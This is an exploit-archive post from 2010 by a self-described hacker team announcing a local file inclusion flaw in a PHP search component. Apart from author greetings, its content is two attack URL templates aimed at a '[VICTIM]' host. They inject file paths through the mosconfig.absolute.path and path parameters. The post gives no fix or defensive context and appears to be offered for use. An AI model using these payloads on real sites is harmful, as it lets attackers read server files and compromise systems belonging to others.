[D] PHP Component -Search- Local File Inclusion Vulnerability [z]

2010-12-25 14:56:00
Posted by: kedans

# Name : [D] PHP Component /Search/ Local File Inclusion Vulnerability [z]

# Date : n/a

# Author : KedAns-Dz < ked-h (at) hotmail (dot) com >

# Team : [D] HaCkerS-StreeT-Team [z]

# special thanks to : BadR0 (+) IslamPard

# greetz to : XoreR (+) Fox-Dz (+) Dr.Ride (+) Red1One (+) Hani Nin0 (+)

// Zaki.ENG (+) Masinhou-Dz (+) MaTmour13 (+) NoR0 Fouiny

Allahou AkbaR -- 1 2 3 ViVa l'Algerie

:::::::::::::::::::::::::::::::::::::::(0x1a)::::::::::::::::::::::::::::::::::::::::

Exploit1:

http://[VICTIM]/[path]/search/?mosconfig.absolute.path=[LFI]


:::::::::::::::::::::::::::::::::::::::(0x2a)::::::::::::::::::::::::::::::::::::::::::

Exploit1:

http://[VICTIM]/search.php?q=battle/board/?path=[LFI]

::::::::::::::::::::::::::::::::::::::(0x3a):::::::::::::::::::::::::::::::::::::::::::

[D] HaCkerS-StreeT-Team [Z]

>> KedAns-Dz (+) BadR0 (+) Dr.Ride (+) XoreR (+) Fox-Dz <<

> Red1One (+) Islampard (+) NoR0 FouinY (+) Hani Nin0 (+) Masinhou-Dz <

:::::::::::::::::::::::::::::: By KedAns DZ :::::::::::::::::::::::::::::::::::::::::::

Fixes

No fixes

In order to submit a new fix you need to be registered.